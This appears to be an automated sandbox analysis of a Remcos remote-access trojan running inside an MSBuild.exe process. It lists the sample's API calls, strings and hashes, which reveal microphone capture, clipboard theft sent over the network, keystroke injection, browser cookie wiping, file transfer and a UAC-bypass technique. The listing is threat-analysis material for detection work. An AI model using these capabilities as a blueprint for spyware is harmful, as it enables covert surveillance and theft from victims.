• Instruction Fuzzy Hash: 6C317E315053009BC314EF25DC56A9E77E8BB94314F00883EF559A21F1EF78AA49CB9A
APIs
• CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
• waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
• waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
• waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
• waveInStart.WINMM ref: 00401A81
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
Similarity
• API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
• String ID: XCG$`=G$x=G
• API String ID: 1356121797-903574159
• Opcode ID: b9d79b778b34dfc6f1519f8bfd66b07f48f7a9fbc911d0f23052e1d1eeff0420
• Instruction ID: 1c4952ee711c82e1d68262a7885cb64ec938acb60d992cd4a46dee1db52e037b
• Opcode Fuzzy Hash: b9d79b778b34dfc6f1519f8bfd66b07f48f7a9fbc911d0f23052e1d1eeff0420
• Instruction Fuzzy Hash: 87215C316012009BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
  • Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
  • Part of subcall function 0041CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
  • Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91
• ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
• lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
• Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9EF
• TranslateMessage.USER32(?), ref: 0041C9FB
• DispatchMessageA.USER32(?), ref: 0041CA05
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA12
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
Similarity
• API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
• String ID: Remcos
• API String ID: 1970332568-165870891
• Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
• Instruction ID: 0af2178feff80faf092f0d4c6bffee9b758878d1eb04e36c9ad6546aee081b39
• Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
• Instruction Fuzzy Hash: 760121B1944344ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• GetCPInfo.KERNEL32(?,?), ref: 00452BD6
• MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00452C59
• __alloca_probe_16.LIBCMT ref: 00452C91
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00452CEC
• __alloca_probe_16.LIBCMT ref: 00452D3B
• MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00452D03
  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00452D7F
• __freea.LIBCMT ref: 00452DAA
• __freea.LIBCMT ref: 00452DB6
Similarity
• API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
• String ID:
• API String ID: 201697637-0
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
• _memcmp.LIBVCRUNTIME ref: 004446A3
• _free.LIBCMT ref: 00444714
• _free.LIBCMT ref: 0044472D
• _free.LIBCMT ref: 0044475F
• _free.LIBCMT ref: 00444768
• _free.LIBCMT ref: 00444774
Strings
Similarity
• API ID: _free$ErrorLast$_abort_memcmp
• String ID: C
• API String ID: 1679612858-1037565863
Strings
Similarity
• API ID:
• String ID: tcp$udp
• API String ID: 0-3725065008
APIs
Strings
Similarity
• API ID: _free
• String ID: gKE$HE$HE
• API String ID: 269201875-2777690135
APIs
• ExitThread.KERNEL32 ref: 004017F4
  • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
  • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
• waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
  • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
• __Init_thread_footer.LIBCMT ref: 004017BC
  • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
  • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
Strings
Similarity
• API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
• String ID: T=G$p[G$>G$>G
• API String ID: 1596592924-2461731529
APIs
• CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
• WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
• CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
• MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
• CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
• DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
  • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
  • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
Strings
Similarity
• API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
• String ID: .part
• API String ID: 1303771098-3499674018
APIs
  • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
  • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
  • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
  • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
• _wcslen.LIBCMT ref: 0041A8F6
Strings
Similarity
• API ID: CloseCurrentOpenProcessQueryValue_wcslen
• String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
• API String ID: 37874593-703403762
APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043D564,0043D564,?,?,?,00449BA1,00000001,00000001,1AE85006), ref: 004499AA
• __alloca_probe_16.LIBCMT ref: 004499E2
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00449BA1,00000001,00000001,1AE85006,?,?,?), ref: 00449A30
• __alloca_probe_16.LIBCMT ref: 00449AC7
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
• __freea.LIBCMT ref: 00449B37
  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
• __freea.LIBCMT ref: 00449B40
• __freea.LIBCMT ref: 00449B65
Similarity
• API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
• String ID:
• API String ID: 3864826663-0
APIs
• SendInput.USER32 ref: 00418B08
• SendInput.USER32(00000001,?,0000001C), ref: 00418B30
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B75
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B95
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BBA
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BDC
• SendInput.USER32(00000001,?,0000001C), ref: 00418BFF
  • Part of subcall function 00418AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AB7
Similarity
• API ID: InputSend$Virtual
• String ID:
• API String ID: 1167301434-0
                                                                                                APIs
                                                                                                • OpenClipboard.USER32 ref: 00415A46
                                                                                                • EmptyClipboard.USER32 ref: 00415A54
                                                                                                • CloseClipboard.USER32 ref: 00415A5A
                                                                                                • OpenClipboard.USER32 ref: 00415A61
                                                                                                • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                • CloseClipboard.USER32 ref: 00415A89
                                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                • String ID:
                                                                                                • API String ID: 2172192267-0
                                                                                                • Opcode ID: 893c5a9c542433f4040ef3059124d24ea93aa08883bf4a62200d77231228e032
                                                                                                • Instruction ID: 9b100a12d13cc6c4196ee8fc3e520842cce62831b2d72284ea91ff5550736cd9
                                                                                                • Opcode Fuzzy Hash: 893c5a9c542433f4040ef3059124d24ea93aa08883bf4a62200d77231228e032
                                                                                                • Instruction Fuzzy Hash: A10152312083009FC314BB75EC5AAEE77A5AFC0762F41457EFD06861A2DF38C845D65A
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: 5969c94153c7b7bc47658fb7421fb2dc5c6178a12c9a66a46f54a64434edbe96
                                                                                                • Instruction ID: 5fecc71d39e6a90402c47f7728bb4f6831cdfeb90858b0dfc168023e2edb8b83
                                                                                                • Opcode Fuzzy Hash: 5969c94153c7b7bc47658fb7421fb2dc5c6178a12c9a66a46f54a64434edbe96
                                                                                                • Instruction Fuzzy Hash: 2361BFB1900205AFEB20DF69C841BAABBF4EB45720F24417BE944FB392E7349D45CB59
                                                                                                APIs
                                                                                                  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                • _free.LIBCMT ref: 00444086
                                                                                                • _free.LIBCMT ref: 0044409D
                                                                                                • _free.LIBCMT ref: 004440BC
                                                                                                • _free.LIBCMT ref: 004440D7
                                                                                                • _free.LIBCMT ref: 004440EE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$AllocateHeap
                                                                                                • String ID: J7D
                                                                                                • API String ID: 3033488037-1677391033
                                                                                                • Opcode ID: e789079c2bca6bbabae9b3291a6a7c0d52dcd5a72fb4a21e852c8be1410d12d6
                                                                                                • Instruction ID: b5a2c1f2d034459fb850ff781f480331835685433a1d37f27cfcf8091ebf3f31
                                                                                                • Opcode Fuzzy Hash: e789079c2bca6bbabae9b3291a6a7c0d52dcd5a72fb4a21e852c8be1410d12d6
                                                                                                • Instruction Fuzzy Hash: 9251E371A00604AFEB20DF6AC841B6AB3F4EF95724F14416EE909D7251E739ED15CB88
                                                                                                APIs
                                                                                                • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A838,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A105
                                                                                                • __fassign.LIBCMT ref: 0044A180
                                                                                                • __fassign.LIBCMT ref: 0044A19B
                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1C1
                                                                                                • WriteFile.KERNEL32(?,00000000,00000000,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A1E0
                                                                                                • WriteFile.KERNEL32(?,?,00000001,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A219
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                • String ID:
                                                                                                • API String ID: 1324828854-0
                                                                                                • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                • Instruction ID: b40464c9ec282996611fef5cbd20273031f87559cdf671a411eba52403cbf28d
                                                                                                • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                • Instruction Fuzzy Hash: DB51E270E002099FEB10CFA8D881AEEBBF8FF09300F14416BE815E3391D6749951CB6A
                                                                                                APIs
                                                                                                • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                                                                  • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                  • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseEnumInfoOpenQuerysend
                                                                                                • String ID: TUFTUF$>G$DG$DG
                                                                                                • API String ID: 3114080316-344394840
                                                                                                • Opcode ID: c2675298c94f2ea0f1412ba57ffa9893590e203943bb56c3b596ad0a80ec4f97
                                                                                                • Instruction ID: 92049c6ae7fba3f13a57cd60a3827c89810429dfa6cf24b756c0ab1f01d338b1
                                                                                                • Opcode Fuzzy Hash: c2675298c94f2ea0f1412ba57ffa9893590e203943bb56c3b596ad0a80ec4f97
                                                                                                • Instruction Fuzzy Hash: 0141A2316042009BC224F635D9A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                                                                APIs
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00437AAB
                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00437B41
                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00437BC1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                • String ID: csm
                                                                                                • API String ID: 1170836740-1018135373
                                                                                                • Opcode ID: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                                • Instruction ID: 9404c61c081bc4e6da2099be8a52027e1297fde76841380def533d3eaa533744
                                                                                                • Opcode Fuzzy Hash: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                                • Instruction Fuzzy Hash: CD410970A04209DBCF20EF19C844A9FBBB5AF0932CF14915BE8556B392D739EE05CB95
                                                                                                APIs
                                                                                                  • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                  • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                  • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                                                                • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                • API String ID: 1133728706-4073444585
                                                                                                • Opcode ID: 205fb3078b12288c199632442ed63e0e5b236c835d65a488769f7ec39f6296ef
                                                                                                • Instruction ID: d844a8c095f6bc09782a4352348c5dfd082864f820bca84d12e352ec49be167e
                                                                                                • Opcode Fuzzy Hash: 205fb3078b12288c199632442ed63e0e5b236c835d65a488769f7ec39f6296ef
                                                                                                • Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 02717eb42979939780aa55e78abd64da983f54570bcab5d4a33c232e0763f4b4
                                                                                                • Instruction ID: 969edc756a0dffe936139f0dc9bce31aed38431af2e56c5058bd22e5c2f4fad6
                                                                                                • Opcode Fuzzy Hash: 02717eb42979939780aa55e78abd64da983f54570bcab5d4a33c232e0763f4b4
                                                                                                • Instruction Fuzzy Hash: 991124B1508654FBDB202F769C4493B3B6CEF82376B10016FFC15D7242DA7C8805C2AA
                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                                                                • int.LIBCPMT ref: 0040FC0F
                                                                                                  • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                  • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                • String ID: P[G
                                                                                                • API String ID: 2536120697-571123470
                                                                                                • Opcode ID: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                                                                                                • Instruction ID: a46b155a0a589d4ea75c4983af6a631921b9d9812a15003568faaf62f6f01cf1
                                                                                                • Opcode Fuzzy Hash: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                                                                                                • Instruction Fuzzy Hash: 7611F331904518A7CB14FBA5D8469DEB7689E44358B20007BF905B72C1EB7CAE45C79D
                                                                                                APIs
                                                                                                  • Part of subcall function 0044FA22: _free.LIBCMT ref: 0044FA4B
                                                                                                • _free.LIBCMT ref: 0044FD29
                                                                                                  • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                • _free.LIBCMT ref: 0044FD34
                                                                                                • _free.LIBCMT ref: 0044FD3F
                                                                                                • _free.LIBCMT ref: 0044FD93
                                                                                                • _free.LIBCMT ref: 0044FD9E
                                                                                                • _free.LIBCMT ref: 0044FDA9
                                                                                                • _free.LIBCMT ref: 0044FDB4
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                • Instruction ID: b6f47af98b99390d2ca34363280ce03bc5e4d1be0f6c4f29549f69d6ae0d3a9a
                                                                                                • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                • Instruction Fuzzy Hash: 5F119031711B04B6F520FBB2CC07FCBB7DC9F42308F814C2EB29E76152E628A9184645
                                                                                                APIs
                                                                                                • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe), ref: 00406835
  • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
  • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
• CoUninitialize.OLE32 ref: 0040688E
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
Similarity
• API ID: InitializeObjectUninitialize_wcslen
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
• API String ID: 3851391207-1840432179
• Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
• Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
• Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
• Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669

APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
• int.LIBCPMT ref: 0040FEF2
  • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
  • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
• std::_Facet_Register.LIBCPMT ref: 0040FF2E
• std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
• String ID: H]G
• API String ID: 2536120697-1717957184
• Opcode ID: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
• Instruction ID: c39742161ac3258eace465d30f2780732a1ff9819e97f4bd037edafe9ec39b9f
• Opcode Fuzzy Hash: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
• Instruction Fuzzy Hash: 9011BF31900419ABCB24FBA5C8468DDB7799F95318B20007FF505B72C1EB78AF09C799

APIs
• DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
• GetLastError.KERNEL32 ref: 0040B2EE
Strings
• [Chrome Cookies not found], xrefs: 0040B308
• UserProfile, xrefs: 0040B2B4
• \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
• [Chrome Cookies found, cleared!], xrefs: 0040B314
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
Similarity
• API ID: DeleteErrorFileLast
• String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
• API String ID: 2018770650-304995407
• Opcode ID: 2f2b76017ea877da9a9f021669f79543ad63569e9aabc20f72a696a2ffc953d7
• Instruction ID: 647c9f6895dd19beb09db90be4e639f81332b1b521455d1adc7a9c6a9ee315b4
• Opcode Fuzzy Hash: 2f2b76017ea877da9a9f021669f79543ad63569e9aabc20f72a696a2ffc953d7
• Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE

APIs
• AllocConsole.KERNEL32(00474358), ref: 0041BEB9
• ShowWindow.USER32(00000000,00000000), ref: 0041BED2
• SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
Similarity
• API ID: Console$AllocOutputShowWindow
• String ID: Remcos v$5.3.0 Pro$CONOUT$
• API String ID: 2425139147-2527699604
• Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
• Instruction ID: 482f1cdaf256b8236abc94a0b12de3dc55517b66349f776fa4240982defd8f75
• Opcode Fuzzy Hash: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
• Instruction Fuzzy Hash: 180171B19803047BD600FBF29D4BFDD37AC9B14705F5004277644E7093EABCA554866D

Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
Similarity
• API ID:
• String ID: (CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$BG
• API String ID: 0-3446331285
• Opcode ID: b7a2e59ac2a9b4cfd69ae58ffa53ef09c4b6135ca76893af750d01e39a00b3fe
